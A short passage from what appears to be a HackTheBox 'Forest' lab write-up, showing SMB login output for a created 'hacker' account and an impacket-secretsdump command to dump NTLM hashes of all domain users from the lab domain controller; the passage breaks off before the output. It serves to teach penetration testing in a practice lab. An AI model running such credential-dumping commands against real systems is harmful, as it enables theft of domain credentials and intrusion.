francescolonardo/writeups/hackthebox_forest.md

 SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
 SMB         10.10.10.161    445    FOREST           [+] htb.local\hacker:H4ck3d! ←
 ```

+The `secretsdump` script from `Impacket` can now be run as `hacker`, and used to reveal the NTLM hashes for all domain users.

 `impacket-secretsdump -dc-ip 10.10.10.161 'htb.local/hacker:H4ck3d!@10.10.10.161'`:
 ```